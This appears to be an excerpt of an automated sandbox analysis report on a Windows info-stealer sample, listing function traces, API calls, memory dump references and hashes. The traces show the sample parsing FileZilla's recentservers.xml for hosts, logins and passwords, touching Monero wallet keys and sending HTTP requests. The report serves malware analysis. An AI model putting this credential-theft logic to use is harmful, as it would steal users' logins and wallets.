                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 655d444d4d20ecfbfcb031581eb250927037691523017e785043fa38750aa434
                            • Instruction ID: c1d66d4691a291796d6ddf038fe1828a88fc72e4013e1638ca3750566dc874e1
                            • Opcode Fuzzy Hash: 655d444d4d20ecfbfcb031581eb250927037691523017e785043fa38750aa434
                            • Instruction Fuzzy Hash: 6F5124F390C6109BD3086F28ED4577ABBE1EB84720F168A2DD9C987684EA354845C787
                            Function 0097D410 Relevance: .2, Instructions: 155COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bcf2240c08c76e0d6102593cb8fa988db0e5d9f713da2e82187058bdc0e87a16
                            • Instruction ID: 1ec51e0d159f1031cccf7e5ad70cfe82e2afe580e6b37d5ce7da73faf936a965
                            • Opcode Fuzzy Hash: bcf2240c08c76e0d6102593cb8fa988db0e5d9f713da2e82187058bdc0e87a16
                            • Instruction Fuzzy Hash: EA4127F3A193185BE3106D2EDC8572AFBDAEBE4311F1B453DDBC083384E9B958048692
                            Function 00933D8F Relevance: .1, Instructions: 142COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7ca2fe9f6f2e1f781477804cef06391c27f4305b0bb013645cb881aebaa48718
                            • Instruction ID: 63ebf70e35a61d548cd536b6347df954fbfbee16eaf6452176145f69aec9d4a4
                            • Opcode Fuzzy Hash: 7ca2fe9f6f2e1f781477804cef06391c27f4305b0bb013645cb881aebaa48718
                            • Instruction Fuzzy Hash: 8D4136B3B082009FF3086A2DEC41BBAB7DADBD4760F16453DD6C583780E93959028296
                            Function 00689750 Relevance: .0, Instructions: 15COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                            • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                            • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                            • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                            Function 00680250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                              • Part of subcall function 00688DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00688E0B
                              • Part of subcall function 0068A920: lstrcpy.KERNEL32(00000000,?), ref: 0068A972
                              • Part of subcall function 0068A920: lstrcat.KERNEL32(00000000), ref: 0068A982
                              • Part of subcall function 0068A8A0: lstrcpy.KERNEL32(?,00690E17), ref: 0068A905
                              • Part of subcall function 0068A9B0: lstrlen.KERNEL32(?,012B8BB8,?,\Monero\wallet.keys,00690E17), ref: 0068A9C5
                              • Part of subcall function 0068A9B0: lstrcpy.KERNEL32(00000000), ref: 0068AA04
                              • Part of subcall function 0068A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0068AA12
                              • Part of subcall function 0068A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0068A7E6
                              • Part of subcall function 006799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006799EC
                              • Part of subcall function 006799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00679A11
                              • Part of subcall function 006799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00679A31
                              • Part of subcall function 006799C0: ReadFile.KERNEL32(000000FF,?,00000000,0067148F,00000000), ref: 00679A5A
                              • Part of subcall function 006799C0: LocalFree.KERNEL32(0067148F), ref: 00679A90
                              • Part of subcall function 006799C0: CloseHandle.KERNEL32(000000FF), ref: 00679A9A
                              • Part of subcall function 00688E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00688E52
                            • GetProcessHeap.KERNEL32(00000000,000F423F,00690DBA,00690DB7,00690DB6,00690DB3), ref: 00680362
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00680369
                            • StrStrA.SHLWAPI(00000000,<Host>), ref: 00680385
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00690DB2), ref: 00680393
                            • StrStrA.SHLWAPI(00000000,<Port>), ref: 006803CF
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00690DB2), ref: 006803DD
                            • StrStrA.SHLWAPI(00000000,<User>), ref: 00680419
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00690DB2), ref: 00680427
                            • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00680463
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00690DB2), ref: 00680475
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00690DB2), ref: 00680502
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00690DB2), ref: 0068051A
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00690DB2), ref: 00680532
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00690DB2), ref: 0068054A
                            • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00680562
                            • lstrcat.KERNEL32(?,profile: null), ref: 00680571
                            • lstrcat.KERNEL32(?,url: ), ref: 00680580
                            • lstrcat.KERNEL32(?,00000000), ref: 00680593
                            • lstrcat.KERNEL32(?,00691678), ref: 006805A2
                            • lstrcat.KERNEL32(?,00000000), ref: 006805B5
                            • lstrcat.KERNEL32(?,0069167C), ref: 006805C4
                            • lstrcat.KERNEL32(?,login: ), ref: 006805D3
                            • lstrcat.KERNEL32(?,00000000), ref: 006805E6
                            • lstrcat.KERNEL32(?,00691688), ref: 006805F5
                            • lstrcat.KERNEL32(?,password: ), ref: 00680604
                            • lstrcat.KERNEL32(?,00000000), ref: 00680617
                            • lstrcat.KERNEL32(?,00691698), ref: 00680626
                            • lstrcat.KERNEL32(?,0069169C), ref: 00680635
                            • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00690DB2), ref: 0068068E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                            • API String ID: 1942843190-555421843
                            • Opcode ID: 1b4443b44b3209b8e4d1369776c85860be86fa7bb3d9eef6cf62a213831ae578
                            • Instruction ID: 8b2e323fff6a372ba5b5ba6ac118d59990ddea454d7de8a7fd364cd9ad9aeacc
                            • Opcode Fuzzy Hash: 1b4443b44b3209b8e4d1369776c85860be86fa7bb3d9eef6cf62a213831ae578
                            • Instruction Fuzzy Hash: C8D131B1900108ABEB48FBF4DD96DEE777EBF14300F504619F502A6491DF38AA0ACB65
                            Function 00675960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0068A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0068A7E6
                              • Part of subcall function 006747B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00674839
                              • Part of subcall function 006747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00674849
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 006759F8
                            • StrCmpCA.SHLWAPI(?,012BF3F0), ref: 00675A13
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00675B93
                            • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,012BF400,00000000,?,012BE4F8,00000000,?,00691A1C), ref: 00675E71
                            • lstrlen.KERNEL32(00000000), ref: 00675E82
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00675E93
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00675E9A
                            • lstrlen.KERNEL32(00000000), ref: 00675EAF
                            • lstrlen.KERNEL32(00000000), ref: 00675ED8
                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00675EF1
                            • lstrlen.KERNEL32(00000000,?,?), ref: 00675F1B
                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00675F2F
                            • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00675F4C
                            • InternetCloseHandle.WININET(00000000), ref: 00675FB0
                            • InternetCloseHandle.WININET(00000000), ref: 00675FBD
                            • HttpOpenRequestA.WININET(00000000,012BF4A0,?,012BEBF8,00000000,00000000,00400100,00000000), ref: 00675BF8
                              • Part of subcall function 0068A9B0: lstrlen.KERNEL32(?,012B8BB8,?,\Monero\wallet.keys,00690E17), ref: 0068A9C5
                              • Part of subcall function 0068A9B0: lstrcpy.KERNEL32(00000000), ref: 0068AA04
                              • Part of subcall function 0068A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0068AA12
                              • Part of subcall function 0068A8A0: lstrcpy.KERNEL32(?,00690E17), ref: 0068A905
                              • Part of subcall function 0068A920: lstrcpy.KERNEL32(00000000,?), ref: 0068A972
                              • Part of subcall function 0068A920: lstrcat.KERNEL32(00000000), ref: 0068A982
                            • InternetCloseHandle.WININET(00000000), ref: 00675FC7
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                            • String ID: "$"$------$------$------
                            • API String ID: 874700897-2180234286
                            • Opcode ID: 82f812e2569d63f1af82c085341ccc5aeab1fe4f6519d42430dfef376f01cc3f
                            • Instruction ID: 4bfdcf2dbf4d8034b575204ec463eb1f2a2b08e8798cdadb3cb5dc44bfd70310
                            • Opcode Fuzzy Hash: 82f812e2569d63f1af82c085341ccc5aeab1fe4f6519d42430dfef376f01cc3f
                            • Instruction Fuzzy Hash: FB12F171820118AAEB55FBA0DC95FEE737ABF14700F50429EF50672091EF742A4ACF69
                            Function 0067CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                              • Part of subcall function 0068A9B0: lstrlen.KERNEL32(?,012B8BB8,?,\Monero\wallet.keys,00690E17), ref: 0068A9C5
                              • Part of subcall function 0068A9B0: lstrcpy.KERNEL32(00000000), ref: 0068AA04
                              • Part of subcall function 0068A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0068AA12
                              • Part of subcall function 0068A8A0: lstrcpy.KERNEL32(?,00690E17), ref: 0068A905
                              • Part of subcall function 00688B60: GetSystemTime.KERNEL32(00690E1A,012BE078,006905AE,?,?,006713F9,?,0000001A,00690E1A,00000000,?,012B8BB8,?,\Monero\wallet.keys,00690E17), ref: 00688B86
                              • Part of subcall function 0068A920: lstrcpy.KERNEL32(00000000,?), ref: 0068A972
                              • Part of subcall function 0068A920: lstrcat.KERNEL32(00000000), ref: 0068A982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0067CF83
                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0067D0C7
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0067D0CE
                            • lstrcat.KERNEL32(?,00000000), ref: 0067D208
                            • lstrcat.KERNEL32(?,00691478), ref: 0067D217
                            • lstrcat.KERNEL32(?,00000000), ref: 0067D22A
                            • lstrcat.KERNEL32(?,0069147C), ref: 0067D239
                            • lstrcat.KERNEL32(?,00000000), ref: 0067D24C
                            • lstrcat.KERNEL32(?,00691480), ref: 0067D25B
                            • lstrcat.KERNEL32(?,00000000), ref: 0067D26E
                            • lstrcat.KERNEL32(?,00691484), ref: 0067D27D
                            • lstrcat.KERNEL32(?,00000000), ref: 0067D290
                            • lstrcat.KERNEL32(?,00691488), ref: 0067D29F
                            • lstrcat.KERNEL32(?,00000000), ref: 0067D2B2
                            • lstrcat.KERNEL32(?,0069148C), ref: 0067D2C1
                            • lstrcat.KERNEL32(?,00000000), ref: 0067D2D4
                            • lstrcat.KERNEL32(?,00691490), ref: 0067D2E3
                              • Part of subcall function 0068A820: lstrlen.KERNEL32(00674F05,?,?,00674F05,00690DDE), ref: 0068A82B
                              • Part of subcall function 0068A820: lstrcpy.KERNEL32(00690DDE,00000000), ref: 0068A885
                            • lstrlen.KERNEL32(?), ref: 0067D32A
                            • lstrlen.KERNEL32(?), ref: 0067D339
                              • Part of subcall function 0068AA70: StrCmpCA.SHLWAPI(012B8988,0067A7A7,?,0067A7A7,012B8988), ref: 0068AA8F
                            • DeleteFileA.KERNEL32(00000000), ref: 0067D3B4
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                            • String ID:
                            • API String ID: 1956182324-0
                            • Opcode ID: 3e379ab27120c6eb9a64badfbaaeb04aba12e94ee8e74e556f84ffe24dcf9966
                            • Instruction ID: 464086d359185a7da2e6d50cd504b9c90076a20ceeff670bea9eccfdb8f6e9e4
                            • Opcode Fuzzy Hash: 3e379ab27120c6eb9a64badfbaaeb04aba12e94ee8e74e556f84ffe24dcf9966
                            • Instruction Fuzzy Hash: CDE120B1910108ABDB48FBE0DD96EEE737ABF14300F104259F907B6491DE39AA05CB76
                            Function 0067C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                              • Part of subcall function 0068A920: lstrcpy.KERNEL32(00000000,?), ref: 0068A972
                              • Part of subcall function 0068A920: lstrcat.KERNEL32(00000000), ref: 0068A982
                              • Part of subcall function 0068A8A0: lstrcpy.KERNEL32(?,00690E17), ref: 0068A905
                              • Part of subcall function 0068A9B0: lstrlen.KERNEL32(?,012B8BB8,?,\Monero\wallet.keys,00690E17), ref: 0068A9C5
                              • Part of subcall function 0068A9B0: lstrcpy.KERNEL32(00000000), ref: 0068AA04
                              • Part of subcall function 0068A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0068AA12
                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,012BD788,00000000,?,0069144C,00000000,?,?), ref: 0067CA6C
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0067CA89
                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0067CA95
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0067CAA8
                            • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0067CAD9
                            • StrStrA.SHLWAPI(?,012BD7A0,00690B52), ref: 0067CAF7
                            • StrStrA.SHLWAPI(00000000,012BD7B8), ref: 0067CB1E
                            • StrStrA.SHLWAPI(?,012BDFC0,00000000,?,00691458,00000000,?,00000000,00000000,?,012B8958,00000000,?,00691454,00000000,?), ref: 0067CCA2
                            • StrStrA.SHLWAPI(00000000,012BDDE0), ref: 0067CCB9
                              • Part of subcall function 0067C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0067C871
                              • Part of subcall function 0067C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0067C87C
                            • StrStrA.SHLWAPI(?,012BDDE0,00000000,?,0069145C,00000000,?,00000000,012B8968), ref: 0067CD5A
                            • StrStrA.SHLWAPI(00000000,012B8C38), ref: 0067CD71
                              • Part of subcall function 0067C820: lstrcat.KERNEL32(?,00690B46), ref: 0067C943
                              • Part of subcall function 0067C820: lstrcat.KERNEL32(?,00690B47), ref: 0067C957
                              • Part of subcall function 0067C820: lstrcat.KERNEL32(?,00690B4E), ref: 0067C978
                            • lstrlen.KERNEL32(00000000), ref: 0067CE44
                            • CloseHandle.KERNEL32(00000000), ref: 0067CE9C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
